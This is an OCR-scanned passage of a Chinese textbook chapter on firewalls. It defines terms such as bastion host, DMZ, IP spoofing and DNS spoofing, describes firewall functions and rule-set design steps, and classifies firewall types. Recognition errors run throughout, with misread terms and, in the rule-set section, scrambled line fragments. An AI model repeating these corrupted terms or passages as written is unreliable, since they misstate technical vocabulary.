连接 到 网 络 上 的 计算 机 系统 ， 它 可 以 是 各 种 类 型 的 机 器 ， 如 PC 或 IBM 主机 等 。 它 可 
以 运行 不 同 操作 系统 ， 如 Windows NT 等 。 

3) ” 堡 爸 主机 (bastion host) 

它 是 一 种 被 强化 的 可 以 防御 进攻 的 计算 机 ， 被 暴露 于 因特网 之 上 ， 作 为 进入 内 部 网 络 
的 一 个 检查 点 。 通 常情 况 下 堡垒 主机 上 运行 一 些 通用 的 操作 系统 。 

4) ” 双 宿 主 主机 (dwal homed host) 

有 两 个 网 络 接口 的 计算 机 系统 。 

5) ”数据 包 过 滤 (package filtering) 

一 些 设 备 ， 如 路 由 器 、 网 桥 或 单独 的 主机 ， 可 以 有 选择 性 地 控制 网 络 上 来 往 的 数据 流 。 
当 数据 包 要 经 过 这 些 设 备 时 ， 这 些 设 备 可 以 检查 数据 包 的 相应 位 ， 根 据 既定 的 原则 来 决定 
是 否 允 许 数据 包 通 过 ， 有 时 这 也 被 称 作 屏蔽 。 
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6) ”屏蔽 路 由 器 (screened router) 

一 种 可 以 根据 过 滤 原 则 对 数据 包 进 行 阻塞 和 转发 的 路 由 器 。 

7) “屏蔽 主机 (screened host) 

被 放置 到 屏蔽 路 由 器 后 面 的 网 络 上 的 主机 ， 主 机 能 被 访问 的 程度 取决 于 路 由 器 的 屏蔽 
规则 。 

8) ”屏蔽 子 网 (screened subnet) 

位 于 屏蔽 路 由 器 后 面 的 子 网 ， 子 网 能 被 访问 的 程度 取决 于 屏蔽 规则 。 

9) ”代理 服务 器 (proxy server) 

一 种 代表 客户 和 真正 服务 器 通信 的 程序 。 典 型 的 代理 接受 用 户 的 客户 请 求 ， 然 后 决定 
用 户 或 用 户 的 人 P 地 址 是 否 有 权 使 用 代理 服务 器 (也 可 能 支持 其 他 的 认证 手段 )， 然 后 代表 客 
户 与 真实 服务 器 之 间 建 立 连接 。 

10) IP 地 址 欺骗 (IP spoofing) 

这 是 一 种 黑客 的 攻击 形式 ， 黑客 使 用 一 台 机 器 ， 而 用 另 一 台 机 器 的 了 P 地 址 ， 从 而 装扮 
成 另 一 台 机 器 和 服务 器 打交道 。 例 如 ， 一 个 防火 墙 不 允许 某 一 竞争 站 点 访问 该 站 点 ， 但 竞 
争 站 点 可 以 使 用 其 他 站 点 的 卫 和 服务 器 通信 , 而 服务 器 则 不 知道 与 它 通信 的 是 竞争 站 点 的 
主机 。 

11) 隧道 路 由 器 (tunneling routcr) 

它 是 一 种 特殊 的 路 由 器 ， 可 以 对 数据 包 进行 加 密 ， 让 数据 能 通过 非 信任 网 (如 因特网 ) 
然后 在 另 一 端 用 同样 的 路 由 器 进行 解密 。 

12) 虚拟 私 用 网 (Virtual Private Network，VPN) 

一 种 连接 两 个 远程 局 域 网 的 方式 ， 连 接 要 通过 非 信 任 网 (如 因特网 )， 所 以 一 般 通 过 隧 
道路 由 器 实现 互联 。 

13) DNS 欺骗 (DNS spoofing ) 

通过 破坏 被 攻击 机 上 的 名 字 服 务 器 的 缓存 , 或 破坏 一 个 域名 服务 器 来 伪造 卫 地 址 和 主 
机 名 的 映射 ， 从 而 冒充 其 他 机 器 。 

14) 差错 与 控制 报 文 ICMP) 

它 是 TCP/IP 协议 中 的 一 种 协议 ， 建 立 在 瑟 层 上 ， 用 于 主机 之 间或 主机 在 路 由 器 之 间 
传输 错误 报 文 以 及 路 由 建议 。 

15) 纵深 防御 (Defense in Depth) 

一 种 确保 网 络 尽 可 能 安全 的 安全 措施 ， 一 般 与 防火 墙 联合 使 用 。 

16) 最 小 特权 (Least Privilege) 

在 运行 和 维护 系统 中 ， 尽 可 能 地 减少 用 户 的 特权 ， 但 同时 也 要 使 用 户 有 足够 的 权限 来 
做 事 ， 这 样 就 会 减少 特权 被 滥用 的 机 会 。 内 部 人 员 滥 用 特权 很 可 能 在 防火 墙 上 打开 一 个 安 
全 缺口 ， 这 很 危险 ， 很 多 的 入 侵 是 由 此 引起 的 。 

使 用 防火 墙 保护 的 益处 如 下 。 

(1) 所 有 风险 区 域 都 集中 在 单一 系统 即 防火 墙 上 ， 安 全 管理 者 就 可 针对 网 络 的 某 个 方 
面 进行 管理 ， 而 采取 的 安全 措施 对 网 络 中 的 其 他 区 域 并 不 会 有 多 大 影响 。 

(2) 监测 与 控制 装置 仅 需 安装 在 防火 墙 中 。 

(3) 内 部 网 络 与 外 部 的 一 切 联系 都 必须 通过 防火 墙 进行 ， 因 此 防火 墙 能 够 监视 与 控制 
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所 有 联系 过 程 。 
7.1.2 ”防火 墙 的 功能 


防火 墙 对 流 经 它 的 网 络 通信 进行 扫描 ， 这 样 能 够 过 滤 掉 一 些 攻 击 ， 以 免 其 在 目标 计算 
机 上 被 执行 。 防 火 墙 可 以 关闭 不 使 用 的 端口 ， 而 且 还 能 禁止 特定 端口 的 流出 通信 ， 封 锁 木 
马 。 最 后 ， 它 可 以 禁止 来 自 特殊 站 点 的 访问 ， 从 而 防止 来 自 不 明 入 侵 者 的 所 有 通信 。 

1) ”防火墙 是 网 络 安全 的 屏障 

一 个 防火 墙 (作为 阻塞 点 、 控 制 点 ) 能 极 大 地 提高 一 个 内 部 网 络 的 安全 性 ， 并 通过 过 滤 
不 安全 的 服务 而 降低 风险 。 由 于 只 有 经 过 精心 选择 的 应 用 协议 才能 通过 防火 墙 ， 所 以 网 络 
环境 变 得 更 安全 。 如 防火 墙 可 以 禁止 诸如 众所周知 的 不 安全 的 NFS 协议 进出 受 保护 网 络 ， 
这 样 外 部 的 攻击 者 就 不 可 能 利用 这 些 脆弱 的 协议 来 攻击 内 部 网 络 。 防 火 墙 同时 可 以 保护 网 
络 免 受 基于 路 由 的 攻击 ， 如 王选 项 中 的 源 路 由 攻击 和 ICMP 重 定向 中 的 重 定向 路 径 。 防 火 
墙 应 该 可 以 拒绝 所 有 以 上 类 型 攻击 的 报 文 并 通知 防火 墙 管理 员 。 

2) ”防火 墙 可 以 强化 网 络 安全 策略 

通过 以 防火 墙 为 中 心 的 安全 方案 配置 ， 能 将 所 有 安全 软件 (如 口令 、 加 密 、 身 份 认证 、 
审计 等 ) 配 置 在 防火 墙 上 。 与 将 网 络 安全 问题 分 散 到 各 个 主机 上 相 比 ， 防 火 墙 的 集中 安全 管 
理 更 经 济 。 例 如 在 网 络 访问 时 ， 加 密 口 令 系统 和 其 他 的 身份 认证 系统 完全 可 以 不 必 分 散在 
各 个 主机 上 ， 而 集中 在 防火 墙 身 上 。 

3) ”对 网 络 存 取 和 访问 进行 监控 审计 

如 果 所 有 的 访问 都 经 过 防火 墙 ， 那么， 防火 墙 就 能 记录 下 这 些 访问 并 做 出 日 志 记 录 ， 
同时 也 能 提供 网 络 使 用 情况 的 统计 数据 。 当 发 生 可 疑 动作 时 ， 防 火 墙 能 进行 适当 的 报警 ， 
并 提供 网 络 是 否 受 到 监测 和 攻击 的 详细 信息 。 另 外 ， 收 集 一 个 网 络 的 使 用 和 误 用 情况 也 是 
非常 重要 的 。 首 先 的 理由 是 可 以 清楚 防火 墙 是 否 能 够 抵挡 攻击 者 的 探测 和 攻击 ， 并 且 清 楚 
防火 墙 的 控制 是 否 充足 。 而 网 络 使 用 统计 对 网 络 需求 分 析 和 威胁 分 析 等 而 言 也 是 非常 重 
要 的 。 

4) 防止 内 部 信息 的 外 泄 

通过 利用 防火 墙 对 内 部 网 络 的 划分 ， 可 实现 对 内 部 网 重点 网 段 的 隔离 ， 从 而 限制 了 局 
部 重点 或 敏感 网 络 安全 问题 对 全 局 网 络 造成 的 影响 。 再 者 ， 隐 私 是 内 部 网 络 非常 关心 的 问 
题 ， 一 个 内 部 网 络 中 不 引 人 注 意 的 细节 ， 可 能 包含 了 有 关 安 全 的 线索 而 引起 外 部 攻击 者 的 
兴趣 ， 甚 至 因此 而 暴露 了 内 部 网 络 的 某 些 安全 漏洞 。 使 用 防火 墙 就 可 以 隐蔽 那些 透漏 内 部 
细节 如 Finger，DNS 等 服务 。Finger 显示 了 主机 的 所 有 用 户 的 注册 名 、 真 名 ， 最 后 登录 时 
间 和 使 用 shell 类 型 等 。 但 是 Finger 显示 的 信息 非常 容易 被 攻击 者 所 获悉 。 攻 击 者 可 以 知道 
一 个 系统 使 用 的 频繁 程度 ， 这 个 系统 是 否 有 用 户 正 在 连 线 上 网 ， 这 个 系统 是 否 在 被 攻击 时 
引起 注意 等 。 防火 墙 可 以 同样 阻塞 有 关内 部 网 络 中 的 DNS 信息 , 这 样 一 台 主 机 的 域名 和 也 
地 址 就 不 会 被 外 界 所 了 解 。 除了 安全 作用 , 防火墙 还 支持 具有 Intemet 服务 特性 的 企业 内 部 
网 络 技术 体系 VPN( 虚 拟 专用 网 )。 
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7.1.3 ”防火 墙 的 规则 


因为 


例 说 


防火 


把 每 


任何 


建立 一 个 可 靠 的 规则 集 对 于 实现 一 个 成 功 的、 安全 的 防火 墙 来 说 是 非常 关键 的 一 步 。 
如 果 防 火 墙 规则 集 配置 错误 ， 再 好 的 防火 墙 也 只 是 摆设 。 在 安全 审计 中 ， 经 常 能 看 到 
巨 资 购 入 的 防火 墙 由 于 某 个 规则 配置 的 错误 而 将 机 构 暴 露 于 巨大 的 危险 之 中 。 下 面 举 
明 如 何 设计 、 建 立 和 维护 一 个 可 靠 的 、 安 全 的 防火 墙 规则 集 。 

例如 : 从 一 个 虚构 机 构 的 安全 策略 开始 ， 基 于 此 策略 ， 来 设计 一 个 防火 墙 规则 集 。 
第 一 步 : 制定 安全 策略 。 

防火 墙 和 防火 墙 规则 集 只 是 安全 策略 的 技术 实现 。 管 理 层 规定 实施 什么 样 的 安全 策略 ， 
墙 是 策略 得 以 实施 的 技术 工具 。 所 以 ， 在 建立 规则 集 之 前 ， 必 须 首先 理解 安全 策略 。 
第 二 步 : 搭建 安全 体系 结构 。 

作为 一 个 安全 管理 员 ， 第 一 步 是 将 安全 策略 转化 为 安全 体系 结构 。 现 在 ， 我 们 来 讨论 
一 项 安全 策略 核心 如 何 转化 为 技术 实现 。 

第 一 项 很 容易 ， 内 部 网 络 的 任何 东西 都 允许 输出 到 Intemet 上 。 

第 二 项 安全 策略 核心 很 微妙 , 这 就 要 求 我 们 要 为 公司 建立 Web 和 E-mail 服务 器 。 由 于 
人 都 能 访问 Web 和 E-mail 服务 器 ， 所 以 我 们 不 能 信任 它们 。 我 们 通过 把 它们 放 入 


DMZ(Demilitarized Zone， 中 立 区 ) 来 实现 该 项 策略 。DMZ 是 一 个 孤立 的 网 络 ， 通 常 把 不 信 


任 的 
和 无 
和 防 
在 那 


关键 


系统 放 在 那里 ，DMZ 中 的 系统 不 能 启动 连接 内 部 网 络 。DMZ 有 两 种 类 型 ， 有 保护 的 
保护 的 。 有 保护 的 DMZ 是 与 防火 墙 脱离 的 孤立 的 部 分 ; 无 保护 的 DMZ 是 介 于 路 由 器 
火 墙 之 间 的 网 络 部 分 。 这 里 建议 使 用 有 保护 的 DMZ， 我 们 把 Web 和 E-mail 服务 器 放 
里 。 

第 三 步 : 制定 规则 次 序 。 

在 建立 规则 集 之 前 ， 有 一 件 事 必须 提 及 ， 即 规则 次 序 。 哪 条 规则 放 在 哪 条 之 前 是 非常 
的 。 同 样 的 规则 ， 以 不 同 的 次 序 放置 ， 可 能 会 完全 改变 防火 墙 的 运转 情况 。 很 多 防火 


墙 (例如 SunScreen EFS、Cisco IOS、FW-D) 以 顺序 方式 检查 信息 包 ， 当 防火 墙 接收 到 一 个 信 


息 包 
就 售 
会 被 
到 一 


时 ， 它 先 与 第 一 条 规则 相 比较 ， 然 后 是 第 二 条 、 第 三 条 …… 当 它 发 现 一 条 匹配 规则 时 
止 检查 并 应 用 那 条 规则 。 如 果 信 息 包 经 过 每 一 条 规则 而 没有 发 现 匹配 ， 这 个 信息 包 便 
拒绝 。 一 般 来 说 ， 通 常 的 顺序 是 ， 较 特殊 的 规则 在 前 ， 较 普通 的 规则 在 后 ， 防 止 在 找 
个 特殊 规则 之 前 一 个 普通 规则 便 被 匹配 ， 这 可 以 使 你 的 防火 墙 避免 配置 错误 。 

第 四 步 : 落实 规则 集 。 

选 好 素材 就 可 以 建立 规则 集 了 ， 下 面 就 简要 概述 每 条 规则 。 

@ 切断 默认 。 

允许 内 部 出 网 。 

添加 锁定 。 

丢弃 不 匹配 的 信息 包 。 

丢弃 并 不 记录 。 

允许 DNS 访问 。 

允许 邮件 访问 。 
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允许 Web 访问 。 
阻塞 DMZ。 
允许 内 部 的 POP 访问 。 
强化 DMZ 的 规则 。 
允许 管理 员 访问 。 
提高 性 能 。 
增加 IDS。 
附加 规则 。 

你 可 以 添加 一 些 附加 规则 ， 例 如 : 阻塞 与 AOL ICQ 的 连接 ,不 要 阻塞 入 口 ， 只 阻塞 目 
的 文件 AOL 服务 器 。 

第 五 步 : 注意 更 换 控 制 。 

在 恰当 地 组 织 好 规则 之 后 ， 还 建议 写 上 注释 并 经 常 更 新 它们 。 注 释 可 以 帮助 你 明白 哪 
条 规则 做 什么 ， 对 规则 理解 得 越 好 ， 错 误 配置 的 可 能 性 就 越 小 。 对 那些 有 多 重 防火 墙 管理 
员 的 大 机 构 来 说 ， 建 议 当 规则 被 修改 时 ， 把 下 列 信息 加 入 注释 中 ， 这 可 以 帮助 你 跟踪 谁 修 
改 了 哪 条 规则 以 及 修改 的 原因 。 

@ ”规则 更 改 者 的 名 字 。 

@ ”规则 变更 的 日 期 /时 间 。 

e@ ”规则 变更 的 原因 。 

第 六 步 : 做 好 审计 工作 。 

当 你 建立 好 规则 集 后 ， 检 测 它 很 关键 。 我 们 所 犯 的 错误 由 好 的 管理 员 去 跟踪 并 找到 
它们 。 

防火 墙 实际 上 是 一 种 隔离 内 外 网 的 工具 。 在 如 今 Internet 访问 的 动态 世界 里 , 在 实现 过 
程 中 很 容易 犯错 误 。 通 过 建立 一 个 可 靠 的、 简单 的 规则 集 ， 你 可 以 创建 一 个 更 安全 地 被 你 
的 防火 墙 所 隔离 的 网 络 环境 。 规 则 越 简单 越 好 。 

在 我 们 深入 探讨 之 前 ， 要 强调 一 下 一 个 简单 的 规则 集 ， 是 建立 一 个 安全 的 防火 墙 的 关 
键 所 在 。 网 络 的 头号 敌人 是 错误 配置 ， 当 你 意外 地 将 消息 访问 协议 GMAP) 公 开 时 ， 入 侵 者 
就 会 试图 悄悄 携带 欺骗 性 的 、 片 段 的 信息 包 通 过 你 的 防火 墙 。 一 个 好 的 准则 最 好 不 要 超过 
30 条 。 一 旦 规则 超过 50 条 ， 你 就 会 以 失败 而 告终 。 当 你 要 从 很 多 规则 入 手 时 ， 就 要 认真 
检查 一 下 你 的 整个 安全 体系 结构 ,而 不 仅仅 是 防火 墙 。 请 尽量 保持 你 的 规则 集 简洁 和 简短 ， 
规则 集 越 简洁 ， 错 误 配 置 的 可 能 性 就 越 小 ， 理 解 和 维护 就 越 容易 ， 系 统 就 越 安 全 。 因 为 规 
则 少 意味 着 只 分 析 少 数 的 规则 ， 防 火 墙 的 CPU 周期 就 短 ， 防 火 墙 效 率 就 可 以 提高 。 


7.2 防火墙 的 分 类 


目前 市 场 的 防火 墙 产品 非常 多 , 划分 的 标准 也 很 多 ， 下 面 简介 几 种 从 不 同 的 角度 分 类 。 
7.2.1 按 软 、 硬 件 分 类 
软件 防火 墙 和 硬件 防火 墙 以 及 芯片 级 防火 墙 。 
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1. 软件 防火 墙 


软件 防火 墙 运行 于 特定 的 计算 机 上 , 它 需 要 客户 预先 安装 好 的 计算 机 操作 系统 的 支持 ， 
一 般 来 说 ， 这 台 计 算 机 就 是 整个 网 络 的 网 关 ， 俗称 “个 人 防火 墙 ”。 软 件 防 火 墙 就 像 其 他 
的 软件 产品 一 样 需要 先 在 计算 机 上 安装 并 做 好 配置 才 可 以 使 用 。 使 用 这 类 防火 墙 ， 需 要 网 
管 对 所 工作 的 操作 系统 平台 比较 熟悉 。 

2. 硬件 防火 墙 

这 里 说 的 硬件 防火 墙 是 指 “ 所 谓 的 硬件 防火 墙 ”。 之 所 以 加 上 “所 谓 ” 二 字 是 针对 芯 
片 级 防火 墙 说 的 。 它 们 最 大 的 差别 在 于 是 否 基于 专用 的 硬件 平台 。 目 前 市 场 上 大 多 数 防 火 
墙 都 是 这 种 所 谓 的 硬件 防火 墙 ， 它 们 都 基于 PC 架构 ， 就 是 说 ， 它 们 和 普通 的 家 庭 用 的 PC 
没有 太 大 区 别 。 在 这 些 PC 架构 计算 机 上 运行 一 些 经 过 裁剪 和 简化 的 操作 系统 ， 最 常用 的 
有 老 版 本 的 UNIX、Linux 和 FreeBSD 系统 。 值 得 注意 的 是 ， 由 于 此 类 防火 墙 采 用 的 依然 是 
别人 的 内 核 ， 因 此 依然 会 受到 OS( 操 作 系 统 ) 本 身 的 安全 性 影响 。 

传统 硬件 防火 墙 一 般 至 少 应 具备 三 个 端口 , 分 别 接 内 网 、 外 网 和 DMZ 区 ( 非 军事 化 区 )， 
现在 一 些 新 的 硬件 防火 墙 往往 扩展 了 端口 ， 常 见 四 端口 防火 墙 一 般 将 第 四 个 端口 作为 配置 
口 、 管 理 端口 。 很 多 防火 墙 还 可 以 进一步 扩展 端口 数目 。 

3. 芯片 级 防火 墙 

芯片 级 防火 墙 基 于 专门 的 硬件 平台 ， 没 有 操作 系统 。 专 有 的 ASIC 芯片 促使 它们 比 其 
他 种 类 的 防火 墙 速度 更 快 ， 处 理 能 力 更 强 ， 性 能 更 高 。 做 这 类 防火 墙 最 出 名 的 厂商 有 
NetScreen、FortiNet、Cisco 等 。 这 类 防火 墙 由 于 是 专用 OS( 操 作 系统 )， 因 此 防火 墙 本 身 的 
漏洞 比较 少 ， 不 过 价格 相对 比较 高 昂 。 


7.2.2 ” 按 技 术 分 类 


根据 防火 墙 所 采用 的 技术 不 同 ， 我 们 可 以 将 它 分 为 三 种 基本 类 型 : 包 过 滤 型 、 应 用 代 
理 型 和 状态 监测 型 。 

1. 包 过 滤 型 防火 墙 

包 过 滤 型 防火 墙 工作 在 网 络 层 ， 对 数据 包 的 源 及 目地 IP 具有 识别 和 控制 作用 ， 对 于 传 
输 层 ,也 只 能 识别 数据 包 是 TCP 还 是 UDP 及 所 用 的 端口 信息 。 现 在 的 路 由 器 .Switch Router 
以 及 某 些 操作 系统 已 经 具有 用 Packet Filter 控制 的 能 力 。 

由 于 只 对 数据 包 的 人 P 地 址 、TCP/UDP 协议 和 端口 进行 分 析 ， 包 过 滤 型 防火 墙 的 处 理 
速度 较 快 ， 并 且 易 于 配置 。 

包 过 滤 型 防火 墙 具 有 根本 的 缺陷 。 

(1) 不 能 防范 黑客 攻击 。 

包 过 滤 型 防火 墙 的 工作 基于 一 个 前 提 ， 就 是 网 管 知道 哪些 人 P 是 可 信 网 络 ， 哪 些 是 不 可 
信 网 络 的 瑟 地 址 。 但 是 随 着 远程 办 公 等 新 应 用 的 出 现 ， 网 管 不 可 能 区 分 出 可 信 网 络 与 不 可 
信 网 络 的 界限 ， 对 于 黑客 来 说 ， 只 需 将 源 人 P 包 改 成 合法 IP 即 可 轻松 通过 包 过 滤 防 火 墙 ， 
进入 内 网 ， 而 任何 一 个 初级 水 平 的 黑客 都 能 进行 人 P 地 址 欺骗 。 
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(2) 不 支持 应 用 层 协议 。 

假如 内 网 用 户 提出 这 样 一 个 需求 ， 只 允许 内 网 员工 访问 外 网 的 网 页 (使 用 HTTP 协议 )， 
不 允许 去 外 网 下 载 电影 (一 般 使 用 FTP 协议 )。 包 过 滤 型 防火 墙 无 能 为 力 ， 因 为 它 不 认识 数 
据 包 中 的 应 用 层 协 议 ， 访 问 控制 力度 太 粗糙 。 

G) 不 能 处 理 新 的 安全 威胁 。 

它 不 能 跟踪 TCP 状态 ， 所 以 对 TCP 层 的 控制 有 漏洞 。 如 当 它 配置 了 仅 允 许 从 内 到 外 
的 TCP 访问 时 ， 一 些 以 TCP 应 答 包 的 形式 从 外 部 对 内 网 进行 的 攻击 仍 可 以 穿 透 防火 墙 。 

综 上 可 见 ， 包 过 滤 型 防火 墙 技术 面 太 过 初级 ， 就 好 比 一 位 保安 只 能 根据 访客 来 自 哪个 
省 市 来 判断 是 否 允许 他 进入 一 样 ， 难 以 履行 保护 内 网 安全 的 职责 。 

2. 应 用 代理 型 防火 墙 

应 用 代理 型 防火 墙 彻底 隔断 内 网 与 外 网 的 直接 通信 ， 内 网 用 户 对 外 网 的 访问 变 成 防火 
墙 对 外 网 的 访问 ， 然 后 再 由 防火 墙 转发 给 内 网 用 户 。 所 有 通信 都 必须 经 应 用 层 代 理 软件 转 
发 ， 访 问 者 任何 时 候 都 不 能 与 服务 器 建立 直接 的 TCP 连接 ， 应 用 层 的 协议 会 话 过 程 必须 符 
合 代理 的 安全 策略 要 求 。 

应 用 代理 型 防火 墙 的 优点 是 : 可 以 检查 应 用 层 、 传 输 层 和 网 络 层 的 协议 特征 ， 对 数据 
包 的 检测 能 力 比 较 强 。 

应 用 代理 型 防火 墙 的 缺点 也 非常 突出 ， 主 要 如 下 。 

(1) 难于 配置 。 

由 于 每 个 应 用 都 要 求 单独 的 代理 进程 ， 这 就 要 求 网 管 能 理解 每 项 应 用 协议 的 弱点 ， 并 
能 合理 地 配置 安全 策略 ， 由 于 配置 烦琐 ， 难 于 理解 ， 容 易 出 现 配置 失误 ， 最 终 影响 内 网 的 
安全 防范 能 力 。 

(2) 处 理 速度 非常 慢 。 

断 掉 所 有 的 连接 ， 由 防火 墙 重新 建立 连接 ， 理 论 上 可 以 使 应 用 代理 型 防火 墙 具有 极 高 
的 安全 性 。 但 是 实际 应 用 中 并 不 可 行 ， 因 为 对 于 内 网 的 每 个 Web 访问 请 求 ， 应 用 代理 都 需 
要 开 一 个 单独 的 代理 进程 ， 它 要 保护 内 网 的 Web 服务 器 、 数 据 库 服务 器 、 文 件 服务 器 、 邮 
件 服务 器 及 业务 程序 等 ， 就 需要 建立 一 个 个 的 服务 代理 ， 以 处 理 客户 端的 访问 请 求 。 这 样 ， 
应 用 代理 的 处 理 延 迟 会 很 大 ， 内 网 用 户 的 正常 Web 访问 就 不 能 及 时 得 到 响应 。 

总 之 ， 应 用 代理 型 防火 墙 不 能 支持 大 规模 的 并 发 连接 ， 在 对 速度 敏感 的 行业 使 用 这 类 
防火 墙 时 简直 是 灾难 。 另 外 ， 防 火 墙 核心 要 求 预先 内 置 一 些 已 知 应 用 程序 的 代理 ， 使 得 一 
些 新 出 现 的 应 用 在 代理 防火 墙 内 被 无 情 地 阻 断 ， 不 能 很 好 地 支持 新 应 用 。 

在 IT 领域 中 ， 新 应 用 、 新 技术 、 新 协议 层出不穷 ,应 用 代理 型 防火 墙 很 难 适 应 这 种 局 
面 。 因 此 ,在 一 些 重要 的 领域 和 行业 的 核心 业务 应 用 中 ,应 用 代理 型 防火 墙 正 被 逐渐 淘汰 。 
但 是 ， 自 适应 代理 技术 的 出 现 让 应 用 代理 型 防火 墙 技术 出 现 了 新 的 转机 ， 它 结合 了 应 用 代 
理 型 防火 墙 的 安全 性 和 包 过 滤 型 防火 墙 的 高 速度 等 优点 ， 在 不 损失 安全 性 的 基础 上 将 应 用 
代理 型 防火 墙 的 性 能 提高 了 10 倍 。 


3. 状态 检测 型 防火 墙 
Intemet 上 传输 的 数据 都 必须 遵循 TCP/IP 协议 , 根据 TCP 协议 , 每 个 可 靠 连 接 的 建 
立 需 要 经 过 “客户 端 同步 请 求 ”、“ 服 务 器 应 答 ”、“ 客 户 端 再 应 答 ” 三 个 阶段 ， 常 用 到 
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的 Web 浏览 ,文件 下 载 、 收 发 邮件 等 都 要 经 过 这 三 个 阶段 。 这 反映 出 数据 包 并 不 是 独立 的 ， 
而 是 前 后 之 间 有 着 密切 的 状态 联系 ， 基 于 这 种 状态 变化 ， 引 出 了 状态 检测 技术 。 

状态 检测 型 防火 墙 据 弃 了 包 过 滤 型 防火 墙 仅 考查 数据 包 的 人 P 地 址 等 几 个 参数 , 而 不 关 
心 数据 包 连 接 状态 变化 的 缺点 ， 在 防火 墙 的 核心 部 分 建立 状态 连接 表 ， 并 将 进出 网 络 的 数 
据 当成 一 个 个 的 会 话 ， 利 用 状态 表 跟 踪 每 一 个 会 话 状 态 。 状 态 监测 对 每 一 个 包 的 检查 不 仅 
根据 规则 表 ， 更 考虑 了 数据 包 是 否 符合 会 话 所 处 的 状态 ， 因 此 提供 了 完整 的 对 传输 层 的 控 
制 能 力 。 

网 关 防 火 墙 的 一 个 挑战 就 是 能 处 理 的 流量 ， 状 态 检测 技术 在 大 为 提高 安全 防范 能 力 的 
同时 也 改进 了 流量 处 理 速度 。 状 态 监测 技术 采用 了 一 系列 优化 技术 ， 使 防火 墙 性 能 大 幅度 
提升 ， 能 应 用 在 各 类 网 络 环境 中 ， 尤 其 是 在 一 些 规则 复杂 的 大 型 网 络 上 。 


7.2.3 防火墙 架 构 


1. 主机 型 防火 墙 


此 防火 墙 需 有 两 张 网 卡 ， 一 张 与 互联 网 连接 ， 另 外 一 张 与 内 部 网 连接 ， 如 此 互联 网 与 
内 部 网 的 通道 无 法 直接 接 通 ， 所 有 数据 包 都 需要 通过 主机 传送 。 


2. 双 闸 型 防火 墙 


此 防火 墙 除了 主机 型 防火 墙 的 两 张 网 卡 外 ， 另 外 安装 应 用 服务 转送 器 的 软件 ， 所 有 网 
络 数据 包 都 须 经 过 此 软件 检查 ， 此 软件 将 过 滤 掉 不 被 系统 所 允许 的 数据 包 。 


3. 屏障 单机 型 防火 墙 


此 防火 墙 的 硬件 设备 除 需要 主机 外 ， 还 需要 一 个 路 由 器 ， 路 由 器 需 具 有 数据 包 过 滤 的 
功能 ， 主 机 则 负责 过 滤 及 处 理 网 络 服务 要 求 的 数据 包 ， 当 互联 网 的 数据 包 进 入 屏障 单机 型 
防火 墙 时 ， 路 由 器 会 先 检 查 此 数据 包 是 否 满足 过 滤 规 则 ， 再 将 过 滤 成 功 的 数据 包 ， 转 送 到 
主机 进行 网 络 服务 层 的 检查 与 传送 。 


4. 屏障 双 闸 型 防火 墙 
将 屏障 单机 型 防火 墙 的 主机 换 成 双 闸 型 防火 墙 即 可 。 
5. 屏障 子 网 域 型 防火 墙 


此 防火 墙 由 多 台 主 机 与 两 个 路 由 器 组 成 , 计算 机 分 成 两 个 区 块 ， 屏障 子 网 域 与 内 部 网 ， 
数据 包 经 由 以 下 路 径 ， 第 一 个 路 由 器 一 屏障 子 网 域 一 第 二 路 由 器 一 内 部 网 ， 此 设计 因 有 阶 
段 式 的 过 滤 功 能 ， 因 此 两 个 路 由 器 可 以 有 不 同 的 过 滤 规 则 ， 让 网 络 数据 包 更 有 效率 。 若 一 
数据 包 通 过 第 一 过 滤器 数据 包 ， 会 先 在 屏障 子 网 域 进行 服务 处 理 ， 若 要 进行 更 深入 内 部 网 
的 服务 ， 则 要 通过 第 二 路 由 器 过 滤 。 


7.2.4 ”防火墙 的 选择 


1. 选择 防火 墙 须 考虑 的 基本 原则 
首先 ， 应 该 明确 你 的 目的 ， 想 要 如 何 操作 这 个 系统 ， 亦 即 只 允许 想 要 的 服务 通过 。 比 
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如 : 某 企业 只 需要 电子 函件 服务 ， 则 该 企业 将 防火 墙 设置 为 只 允许 电子 函件 服务 通过 ， 而 
禁止 FTP、WWW 等 服务 ， 还 是 允许 多 种 业务 通过 防火 墙 ， 但 要 设置 相应 的 监测 、 计 量 、 
注册 和 稽核 等 。 

其 次 ， 是 想 要 达到 什么 级 别 的 监测 和 控制 。 根 据 网 络 用 户 的 实际 需要 ， 建 立 相应 的 风 
险 级 别 ， 随 之 便 可 形成 一 个 需要 监测 、 人 允许 、 禁 止 的 清单 。 再 根据 清单 的 要 求 来 设置 防火 
墙 的 各 项 功能 。 

第 三 ， 是 费用 问题 。 在 市 场 上 ， 防 火 墙 的 售 价 极为 悬殊 ， 从 几 万 元 到 数 十 万 元 ， 甚 至 
到 百 万 元 。 因 为 各 企业 用 户 使 用 的 安全 程度 不 尽 相 同 ， 因 此 厂商 所 推出 的 产品 也 有 所 区 分 ， 
甚至 有 些 公司 还 推出 类 似 模块 化 的 功能 产品 ， 以 符合 各 种 不 同 企业 的 安全 要 求 。 安 全 性 越 
高 ， 实 现 越 复杂 ， 费 用 也 相应 越 高 ， 反 之 费用 较 低 。 这 就 需要 对 网 络 中 需 保 护 的 信息 和 数 
据 进 行 详细 的 经 济 性 评估 。 一 般 网 络 安全 防护 系统 的 造价 占 需 保护 资源 价值 的 1% 左 右 。 所 
以 在 装配 防火 墙 时 ， 费 用 与 安全 性 的 折 中 是 不 可 避免 的 ， 这 也 就 决定 了 “绝对 安全 ”的 防 
火 墙 是 不 存在 的 。 但 是 可 以 在 现 有 经 济 条 件 下 尽 可 能 科学 地 配置 各 种 防御 措施 ， 使 防火 墙 
充分 发 挥 作用 。 


2. 选择 防火 墙 的 基本 标准 


广义 地 说 ， 只 要 是 能 够 限制 封包 通行 的 网 络 设备 ， 或 安装 在 各 种 操作 系统 上 的 软件 都 
可 以 用 来 当 作 防 火 墙 。 我 们 可 以 由 不 同 特性 的 防火 墙 设计 方式 来 评估 各 种 防火 墙 是 否 足够 
安全 ， 以 及 能 否 满足 企业 的 安全 需求 。 具 体 说 来 ， 有 以 下 几 类 指标 。 

1) ”防火 墙 的 管理 难 易 度 

防火 墙 的 管理 难 易 度 也 是 防火 墙 能 否 达 到 目的 的 主要 考虑 因素 之 一 。 若 防火 墙 的 管理 
过 于 困难 ， 则 可 能 会 造成 设 定 上 的 错误 ， 反 而 不 能 达到 其 功能 。 一 般 企 业 之 所 以 很 少 以 已 
有 的 网 络 设备 直接 当 作 防 火 墙 的 原因 ， 除 了 先前 提 到 的 包 过 滤 ， 并 不 能 达到 完全 的 控制 之 
